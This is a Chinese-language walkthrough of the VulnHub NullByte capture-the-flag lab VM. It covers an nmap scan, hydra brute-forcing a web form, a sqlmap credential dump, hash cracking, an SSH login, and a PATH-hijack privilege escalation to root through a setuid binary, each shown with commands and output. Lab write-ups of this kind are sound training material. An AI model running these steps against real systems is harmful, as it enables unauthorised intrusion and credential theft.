NullByte
https://download.vulnhub.com/nullbyte/NullByte.ova.zip
靶场IP:192.168.32.14
扫描对外端口服务
┌──(root㉿kali)-[~]
└─# nmap -sV -p1-65535 192.168.32.14
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 22:43 EDT
Nmap scan report for 192.168.32.14
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
44438/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:6C:32:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds
访问80端口
爆破web目录,没有发现有用的信息。
┌──(root㉿kali)-[~]
└─# dirb http://192.168.32.14/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Sep 8 22:44:56 2022
URL_BASE: http://192.168.32.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.32.14/ ----
+ http://192.168.32.14/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.32.14/javascript/
==> DIRECTORY: http://192.168.32.14/phpmyadmin/
+ http://192.168.32.14/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.32.14/uploads/
---- Entering directory: http://192.168.32.14/javascript/ ----
==> DIRECTORY: http://192.168.32.14/javascript/jquery/
---- Entering directory: http://192.168.32.14/phpmyadmin/ ----
==> DIRECTORY: http://192.168.32.14/phpmyadmin/docs/
+ http://192.168.32.14/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.32.14/phpmyadmin/index.php (CODE:200|SIZE:9115)
==> DIRECTORY: http://192.168.32.14/phpmyadmin/js/
+ http://192.168.32.14/phpmyadmin/libraries (CODE:403|SIZE:308)
==> DIRECTORY: http://192.168.32.14/phpmyadmin/locale/
+ http://192.168.32.14/phpmyadmin/phpinfo.php (CODE:200|SIZE:9117)
+ http://192.168.32.14/phpmyadmin/setup (CODE:401|SIZE:460)
==> DIRECTORY: http://192.168.32.14/phpmyadmin/themes/
---- Entering directory: http://192.168.32.14/uploads/ ----
+ http://192.168.32.14/uploads/index.html (CODE:200|SIZE:113) 查看图片信息,找到一个路径:kzMb5nVYJw
┌──(root㉿kali)-[/tmp]
└─# exiftool main.gif
ExifTool Version Number : 12.44
File Name : main.gif
Directory : .
File Size : 17 kB
File Modification Date/Time : 2022:09:08 22:46:44-04:00
File Access Date/Time : 2022:09:08 22:46:44-04:00
File Inode Change Date/Time : 2022:09:08 22:46:44-04:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
访问:/kzMb5nVYJw
查看页面源代码
使用hydra爆破输入框
┌──(root㉿kali)-[~]
└─# hydra 192.168.32.14 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /usr/share/wordlists/rockyou.txt -la
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-08 23:04:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.32.14:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4387.00 tries/min, 4387 tries in 00:01h, 14340012 to do in 54:29h, 16 active
[STATUS] 4537.33 tries/min, 13612 tries in 00:03h, 14330787 to do in 52:39h, 16 active
[80][http-post-form] host: 192.168.32.14 login: a password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-08 23:09:39
爆破出来的密码是:elite
输入框存在SQL注入漏洞
┌──(root㉿kali)-[/tmp]
└─# sqlmap -u "http://192.168.32.14/kzMb5nVYJw/420search.php?usrtosearch=1" --level 5 --risk 3 -p usrtosearch --batch --dbms=mysql -D seth -T users --dump
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
base64解密
┌──(root㉿kali)-[/tmp]
└─# echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=' | base64 -d
c6d6bd7ebf806f43c76acc3681703b81 hashcat爆破哈希
┌──(root㉿kali)-[/tmp]
└─# hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt ssh登录
┌──(root㉿kali)-[~]
└─# ssh ramses@192.168.32.14 -p 777
ramses@192.168.32.14's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
找到procwatch,procwatch是调用ps命令。
ramses@NullByte:~$ cd /var/www/
ramses@NullByte:/var/www$ ls
backup html
ramses@NullByte:/var/www$ cd backup/
ramses@NullByte:/var/www/backup$ ls
procwatch readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1486 pts/0 00:00:00 procwatch
1487 pts/0 00:00:00 sh
1488 pts/0 00:00:00 ps
ramses@NullByte:/var/www/backup$
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1489 pts/0 00:00:00 procwatch
1490 pts/0 00:00:00 sh
1491 pts/0 00:00:00 ps
ramses@NullByte:/var/www/backup$ ./procwatch aux
PID TTY TIME CMD
1492 pts/0 00:00:00 procwatch
1493 pts/0 00:00:00 sh
1494 pts/0 00:00:00 ps
于是可以修改环境变量,让procwatch执行假的ps命令。
ramses@NullByte:/var/www/backup$ cp /bin/sh /tmp/ps
ramses@NullByte:/var/www/backup$ export PATH="/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
ramses@NullByte:/var/www/backup$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls -al
total 32
drwx------ 4 root root 4096 Aug 2 2015 .
drwxr-xr-x 21 root root 4096 Aug 1 2015 ..
drwx------ 2 root root 4096 Aug 2 2015 .aptitude
-rw------- 1 root root 2364 Aug 2 2015 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 1170 Aug 2 2015 proof.txt
drwx------ 2 root root 4096 Aug 2 2015 .ssh
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
最后更新于
